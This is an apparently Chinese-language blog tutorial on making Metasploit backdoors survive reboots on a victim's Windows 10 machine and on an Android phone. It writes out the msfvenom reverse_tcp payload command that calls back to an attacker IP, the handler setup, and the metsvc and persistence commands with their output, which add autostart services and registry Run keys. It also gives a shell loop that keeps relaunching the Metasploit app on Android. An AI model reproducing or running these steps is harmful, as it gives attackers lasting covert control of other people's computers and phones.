持久ing+

持久化

在msf生成的shell中,無論是是android還是windows在關閉軟件或者設備重啓後,我們的會話進程都會自然而然的關閉。要想得到會話,必須用戶再次啓動我們的shell才能得到會話。那麼,我們該如何解決這一問題呢?
持久化

持久化

msf/Windows持久化

1、metsvc:通過服務啓動,是 Meterpreter 下的一個腳本;

運行 run metsvc 將會在目標主機上以 Meterpreter 的服務的形式註冊在服務列表中,並開機自動自動;

運行 run metsvc -r 卸載目標主機上的 Meterpreter 服務;

原理:設置的後門在目標機啓動後會自動開啓一個服務,等待連接;這個有點正向代理的意思,自己開個端口等待接入控制;

優點:命令簡單,不必設置太多參數,即不需要設置反彈到的主機IP、端口等,直接 run metsvc -A;

缺點:如何其他人知道服務器的ip,都可以利用這個後門開啓的服務來控制服務器【掃描器發現】;

2、persistence:通過啓動項啓動,也是 Meterpreter 下的一個腳本;

移除後門:刪除註冊表中的值和上傳的 VBScript 文件,具體位置執行腳本後有提示。

原理:有點反向代理的意思;

優點:由於是主動獻殷勤,目標機器上的防火牆對於此等操作一般均會放行,後門的存活率較高;

環境介紹

  • vps(msf端口)
  • win10 (受害者)

生成shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.100 LPORT=4444 -f exe > ~/root/bbskali.exe 
Bash
複製

配置msf

msf exploit(handler) > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.43.100
lhost => 192.168.43.100
msf exploit(handler) > exploit 
Bash
複製

metsvc利用

meterpreter > run metsvc

[!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe.
[!] Example: run post/windows/manage/persistence_exe OPTION=value [.]
[] Creating a meterpreter service on port 31337
[
] Creating a temporary installation directory C:\Users\Go0s\AppData\Local\Temp\HLDIkkGKSJ.
[] >> Uploading metsrv.x86.dll.
[
] >> Uploading metsvc-server.exe.
[] >> Uploading metsvc.exe.
[
] Starting the service.
Cannot open service manager (0x00000005)

Bash
複製

拿到 Meterpreter 會話,重新執行 run metsvc -A即可。

移除服務

meterpreter > run metsvc -r
Bash
複製

利用 persistence

meterpreter > run persistence -U -i 10 -p 4444 -r 192.168.43.100
Bash
複製

重啓目標機,仍然上線。

其腳本主要做的工作:

①、上傳後門到目標機器【meterpreter的upload命令】;

②、再寫自啓動註冊表【reg】;

移除

根據執行腳本時提示的vbs文件和註冊表位置,進行刪除後門;

Executing script C:\Users\Go0s\AppData\Local\Temp\SAaYfc.vbs
Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\irZnsVkfdRUZIB
Bash
複製

android持久

首先,我們生成android shell 並運行。如圖,我們成功得到會話。
msf

msf

利用cd命令,切換到手機的根目錄。
這裏以小米手機爲例:
cd /storage/emulated/0


在此目錄下,我們新建一個shell.sh文件,寫入內容如下:
新建命令:edit shell.sh
內容:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
Bash
複製

輸入:wq保存即可。


在終端執行shellsh shell.sh

這樣,我們就能得到持久的會話了!

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章